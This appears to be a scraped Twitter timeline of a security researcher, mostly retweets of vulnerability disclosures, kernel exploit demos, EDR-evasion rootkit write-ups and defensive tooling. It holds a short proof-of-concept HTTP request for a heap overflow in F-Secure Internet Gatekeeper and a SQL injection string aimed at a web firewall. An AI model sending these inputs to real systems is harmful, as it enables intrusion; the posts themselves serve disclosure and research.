| Tweets |
| nowayout retweeted | ||
|
Dave dwizzzle Weston
@dwizzzleMSFT
|
9 h |
|
Truth is all fancy EDRs and endpoint security can be disabled by an attack like this. With Driver control using HVCI on Windows 10 this attack is prevented. You don’t need to buy this, it’s included in Windows 10 pro and up. All Secured core PCs have it on by default. twitter.com/SwiftOnSecurit…
|
nowayout
@brnocrist
|
20 h |
|
"live, repudiate work and love"
| nowayout retweeted | ||
|
Pierre PACI
@pierre_paci
|
Feb 5 |
|
| nowayout retweeted | ||
|
Dave dwizzzle Weston
@dwizzzleMSFT
|
Feb 5 |
|
Just posted my talk "Keeping Windows Secure" touching on security assurance process and vuln research in Windows from @BlueHatIL 2019: github.com/dwizzzle/Prese…
| nowayout retweeted | ||
|
Steve Crowley
@StevenJCrowley
|
Feb 2 |
|
Performance artist generates virtual traffic jams in Google Maps by pulling a wagon full of smartphones
simonweckert.com/googlemapshack… pic.twitter.com/m3bmQXvswI
| nowayout retweeted | ||
|
Jin Wook Kim
@wugeej
|
Feb 4 |
|
[PoC] Heap Overflow in F-Secure Internet Gatekeeper
POST /submit HTTP/1.1
Host: 192.168.0.24:9012
Content-Length: 21487483844
AAAAAAAAAAAAAAAAAAAAAAAAAAA
blog.doyensec.com/2020/02/03/hea…
|
nowayout
@brnocrist
|
Feb 3 |
|
also ' or 1=1 , akamai WAF? :P
|
nowayout
@brnocrist
|
Feb 3 |
|
also tracert, but traceroute6 works
| nowayout retweeted | ||
|
Gaetano Zappulla
@gaetanoz
|
Feb 3 |
|
How to decrypt WhatsApp end-to-end media files blog.erratasec.com/2020/01/how-to…
| nowayout retweeted | ||
|
raptor
@0xdea
|
Feb 2 |
|
And here’s a wonderful post by OpenSMTPD’s main developer @PoolpOrg:
poolp.org/posts/2020-01-…
Very interesting insight on how a bug enters the code and becomes exploitable over time. twitter.com/0xdea/status/1…
| nowayout retweeted | ||
|
Yarden Shafir
@yarden_shafir
|
Feb 2 |
|
Can your EDR detect symbolic link callback rootkits? Because ours sure as heck can't.
@aionescu and I wrote about these!
windows-internals.com/dkom-now-with-…
|
nowayout
@brnocrist
|
Jan 30 |
|
The ebpf filter bypass found by Jann
| nowayout retweeted | ||
|
Andrey Konovalov
@andreyknvl
|
Jan 29 |
|
Implemented a PoC for disabling kernel lockdown on Ubuntu via a keyboard emulated through USB/IP, CC @mjg59
github.com/xairy/unlockdo…
| nowayout retweeted | ||
|
Andreas Kling
@awesomekling
|
Jan 28 |
|
OS hacking: Local root exploit via the QEMU graphics driver
youtu.be/DhVZ7vO69DI
Let’s exploit a SerenityOS kernel driver bug to get a root shell, and then fix the bug! 🐞🛠😎
| nowayout retweeted | ||
|
Open Source Security
@oss_security
|
Jan 28 |
|
Linux kernel: user-triggerable read-after-free crash or 1-bit infoleak oracle in open(2): Posted by Solar Designer on Jan 28 Hi, First, to avoid such questions or potential duplicate CVE ID assignment: I intend to request a CVE ID and post it as a… dlvr.it/RNxBbD
|
nowayout
@brnocrist
|
Jan 28 |
|
| nowayout retweeted | ||
|
Howard Oakley
@howardnoakley
|
Jan 27 |
|
What could possibly go wrong on an app first run? eclecticlight.co/2020/01/27/wha… pic.twitter.com/CTVY8GXmoA
|
nowayout
@brnocrist
|
Jan 27 |
|
.[] | select(.username == "root") | .password
| nowayout retweeted | ||
|
Stuart Winter-Tear
@StegoPax
|
Jan 23 |
|
Microsoft have released an open source tool to analyze source code for vulnerabilities in almost any modern language:
github.com/Microsoft/Appl…
| nowayout retweeted | ||
|
GitHub Security Lab
@GHSecurityLab
|
Jan 23 |
|